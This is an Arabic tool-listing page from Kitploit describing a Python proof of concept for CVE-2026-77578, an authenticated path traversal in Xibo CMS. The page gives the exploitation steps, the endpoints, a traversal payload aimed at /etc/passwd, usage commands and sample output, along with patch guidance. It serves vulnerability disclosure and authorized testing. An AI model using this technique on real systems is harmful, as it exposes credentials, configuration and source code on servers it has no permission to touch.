Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-77578 — إثبات مفهوم بلغة Python يستغل CVE-2026-77578، وهو اجتياز مسار موثّق في Xibo CMS يقرأ ملفات محلية عشوائية عبر استيرادات قوالب XML المُصمَّمة. | Kitploit
أدوات/GitHubGitHub/soskalai/cve-2026-77578
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubsoskalai/cve-2026-77578

CVE-2026-77578

إثبات مفهوم بلغة Python يستغل CVE-2026-77578، وهو اجتياز مسار موثّق في Xibo CMS يقرأ ملفات محلية عشوائية عبر استيرادات قوالب XML المُصمَّمة.

عرض المستودع
1منذ يوم واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-77578 — قراءة ملفات محلية عشوائية في Xibo CMS

نظرة عامة

CVE-2026-77578 هو ثغرة قراءة ملفات محلية عشوائية تتطلب المصادقة في Xibo CMS.

يمكن لمستخدم مُصادَق عليه يمتلك صلاحيات المسؤول (Admin) أو صلاحية الوصول إلى قوالب الوحدات (Module Templates) استيراد قالب XML مُصمَّم بعناية يحتوي على أصل (asset) قائم على مسار مع تسلسل اجتياز المسار (path traversal). بعد ذلك يمكن الوصول إلى الأصل الناتج عبر نقطة نهاية أصول الوحدة (module asset endpoint)، مما يؤدي إلى قيام Xibo بإرجاع محتويات الملف المحلي المُشار إليه.

الإصدارات المتأثرة والمُرقَّعة

  • المتأثرة: Xibo CMS <= 4.4.3
  • المُرقَّعة: Xibo CMS >= 4.4.4
  • الإصلاح الموصى به: الترقية إلى Xibo CMS 4.4.4 أو أحدث.

تفاصيل الثغرة

  • CVE: CVE-2026-77578
  • GHSA: GHSA-pc3g-2hhm-46qc
  • نوع الثغرة: CWE-22 — اجتياز المسار (Path Traversal)
  • المصادقة: مطلوبة
  • الصلاحية المطلوبة: الوصول إلى ميزة قالب المطوّر (Developer Template)
  • الخطورة: عالية
  • CVSS v3.1: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
  • التأثير: قراءة الملفات التي يمكن لمستخدم خادم الويب الوصول إليها
  • إثبات المفهوم (Proof of Concept)

    إشعار Xibo الرسمي

    نشرت Xibo الثغرة تحت المُعرّف GHSA-pc3g-2hhm-46qc، مؤكدةً أن الإصدارات <= 4.4.3 متأثرة وأن الإصدارات >= 4.4.4 مُرقَّعة. يُصنّف الإشعار الخطورة على أنها عالية مع درجة CVSS v3.1 تساوي 8.8، ويُحدّد CVE-2026-77578.

    يقوم نص إثبات المفهوم بلغة Python المرفق بأتمتة عملية الاستغلال:

    1. المصادقة على Xibo CMS.
    2. استرجاع رمز CSRF من صفحة قوالب الوحدات (Module Templates).
    3. توليد مُعرّف أصل (asset) فريد.
    4. رفع قالب XML مُصمَّم بعناية عبر /developer/template/import.
    5. يحتوي ملف XML على أصل قائم على مسار باستخدام تسلسل اجتياز مسار نسبي.
    6. طلب الأصل الناتج عبر /module/asset/<asset-id>.
    7. عرض محتويات الملف المحلي المطلوب.

    الاستخدام

    root@kitploit:~
    python3 poc.py <URL> -u <USERNAME> -p <PASSWORD> -f <FILE>
    

    مثال:

    root@kitploit:~
    python3 poc.py http://localhost \
        -u xibo_admin \
        -p password \
        -f /etc/passwd
    

    مثال آخر:

    root@kitploit:~
    python3 poc.py http://localhost \
        -u xibo_admin \
        -p password \
        -f /etc/os-release
    

    الخيار -f يكون افتراضيًا /etc/passwd.

    مثال على المخرجات

    يوضّح ما يلي الاسترجاع الناجح للملف /etc/passwd:

    root@kitploit:~
    ==============================================
     FILE CONTENT
    ==============================================
    
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    ...
    

    CVE-2026-77578 PoC Output

    التدفق التقني

    root@kitploit:~
    Authenticated User
            |
            v
    GET /developer/template/view
            |
            v
    Extract X-XSRF-TOKEN
            |
            v
    POST /developer/template/import
            |
            |  Crafted XML
            |  path="../../../../../etc/passwd"
            v
    Xibo creates the asset
            |
            v
    GET /module/asset/<asset-id>
            |
            v
    Contents of local file returned
    

    التحقق

    تم التحقق من الثغرة بنجاح مقابل عدة ملفات في بيئة اختبار محلية لـ Xibo CMS 4.4.3، بما في ذلك:

    • /etc/passwd
    • /etc/hosts
    • /etc/os-release
    • /var/www/cms/web/index.php

    يوضّح اختبار ملف مصدر PHP أن المشكلة قادرة على إرجاع الشيفرة المصدرية للتطبيق، وليس مجرد بيانات وصفية للنظام.

    التأثير

    يتيح الاستغلال الناجح لمهاجم مُصادَق عليه يمتلك صلاحيات قوالب الوحدات المطلوبة قراءة ملفات عشوائية يمكن لعملية تطبيق Xibo الوصول إليها.

    اعتمادًا على طريقة النشر، قد يؤدي ذلك إلى كشف:

    • الشيفرة المصدرية للتطبيق
    • ملفات الإعدادات
    • بيانات الاعتماد
    • مفاتيح API
    • معلومات الاتصال بقاعدة البيانات
    • بيانات أخرى حساسة على نظام الملفات

    إخلاء المسؤولية

    يُقدَّم إثبات المفهوم هذا لأغراض البحث الأمني المُصرَّح به والاختبار الدفاعي فقط.

    اختبر فقط الأنظمة التي تملكها أو التي لديك إذن صريح بتقييمها.

    هيكل المستودع

    root@kitploit:~
    CVE-2026-77578/
    ├── poc.py
    ├── README.md
    ├── LICENSE
    ├── .gitignore
    └── screenshots/
        └── poc-output.png
    
    تنزيل الأداة